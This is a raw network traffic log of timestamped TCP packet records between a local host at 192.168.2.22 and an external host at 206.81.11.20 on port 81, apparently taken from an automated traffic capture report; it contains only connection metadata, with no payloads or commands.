Nov 10, 2022 11:43:14.643361092 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.643366098 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.643388033 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.643404007 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.643409967 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.643431902 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.643450022 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.643454075 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.643461943 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.643476009 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.643493891 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.643498898 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.643521070 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.643537998 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.643543005 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.643564939 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.643580914 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.643587112 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.643610954 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.643631935 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.643635988 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.643635988 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.643654108 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.643671989 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.643676996 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.643709898 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.643718004 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.643734932 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.643758059 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.643774986 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.643781900 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.643795013 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.643805981 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.643829107 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.643845081 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.643851995 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.643872023 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.643892050 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.643894911 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.643918037 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.643939972 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.643946886 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.643963099 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.643963099 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.643985987 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644005060 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.644010067 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644032955 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644052029 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.644056082 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644078970 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644097090 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.644103050 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644126892 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644130945 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.644150019 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644166946 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.644175053 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644198895 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644213915 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.644222975 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644246101 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644263029 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.644269943 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644285917 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.644294024 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644319057 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644349098 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644351959 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.644372940 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644387960 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.644396067 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644419909 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644434929 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.644442081 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644453049 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.644468069 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644493103 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644505024 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.644516945 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644540071 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644555092 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.644563913 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644588947 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644604921 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.644612074 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644634962 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644658089 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644680023 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644686937 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.644700050 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.644704103 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644727945 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644745111 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.644752026 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644773960 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.644778967 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644804955 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644820929 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.644828081 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644851923 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644867897 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.644875050 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644898891 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644913912 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.644922018 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644944906 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644951105 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.644968987 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.644983053 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.644994020 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.645018101 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.645032883 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.645040989 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.645064116 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.645081043 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.645087957 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.645102978 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.645292997 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.666520119 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.666585922 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.666627884 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.666666985 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.666680098 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.666704893 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.666723013 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.666743994 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.666781902 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.666790962 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.666822910 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.666861057 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.666863918 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.666943073 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.666982889 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.666982889 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.667022943 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.667061090 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.667062044 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.667099953 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.667138100 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.667140961 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.667176008 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.667215109 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.667215109 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.667253971 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.667293072 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.667295933 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.667336941 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.667373896 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.667385101 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.667412043 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.667449951 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.667450905 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.667488098 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.667527914 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.667529106 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.667566061 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.667603970 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.667603970 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.667644978 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.667696953 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.667697906 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.667736053 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.667785883 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.667785883 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.667824030 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.667860985 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.667861938 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.667898893 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.667936087 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.667937994 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.667974949 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.668013096 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.668014050 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.668051958 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.668091059 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.668092012 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.668128014 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.668165922 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.668167114 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.668204069 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.668241978 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.668245077 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.668278933 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.668318987 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.668318987 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.668359995 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.668396950 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.668406010 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.668435097 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.668472052 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.668474913 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.668509960 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.668548107 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.668549061 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.668586016 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.668622971 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.668626070 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.668668032 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.668706894 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.668708086 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.668744087 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.668782949 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.668782949 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.668822050 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.668860912 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.668860912 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.668899059 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.668936014 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.668936968 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.668975115 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.669012070 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.669013977 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.669051886 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.669089079 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.669089079 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.669136047 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.669173002 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.669173956 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.669212103 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.669248104 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.669250011 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.669289112 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.669327974 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.669328928 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.669367075 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.669404030 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.669404030 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.669442892 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.669481039 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.669482946 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.669517994 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.669554949 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.669559002 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.669593096 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.669631004 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.669634104 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.669670105 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.669707060 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.669708967 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.669744015 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.669780970 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.669784069 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.669826031 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.669863939 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.669864893 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.669903040 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.669940948 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.669940948 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.669981003 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.670018911 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.670022011 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.670056105 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.670093060 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.670094013 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.670130968 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.670169115 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.670170069 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.670207024 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.670244932 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.670995951 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.672144890 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.722531080 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.722558975 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.722578049 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.722594976 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.722606897 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.722614050 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.722651005 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.722949028 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.722999096 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.726401091 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.726419926 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.726438046 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.726464033 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.732814074 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.732848883 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.732867002 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.732884884 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.732903004 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.732903957 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.732939959 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.732949018 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.732960939 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.732968092 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.732980013 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733000040 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733004093 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.733019114 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733036041 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733038902 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.733057022 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733071089 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.733077049 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733095884 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733114004 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733114004 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.733133078 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733154058 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.733156919 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733176947 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733201981 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.733218908 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733241081 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733257055 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.733264923 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733290911 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733302116 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.733314037 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733335972 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733352900 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.733357906 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733381033 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733396053 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.733402967 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733426094 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733442068 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.733448982 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733472109 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733486891 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.733494043 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733516932 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733532906 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.733539104 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733561993 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733577967 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.733583927 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733607054 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733620882 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.733630896 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733653069 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733669996 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.733675957 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733699083 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733714104 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.733721018 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733741999 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733758926 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.733764887 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733788013 CET	81	49173	206.81.11.20	192.168.2.22
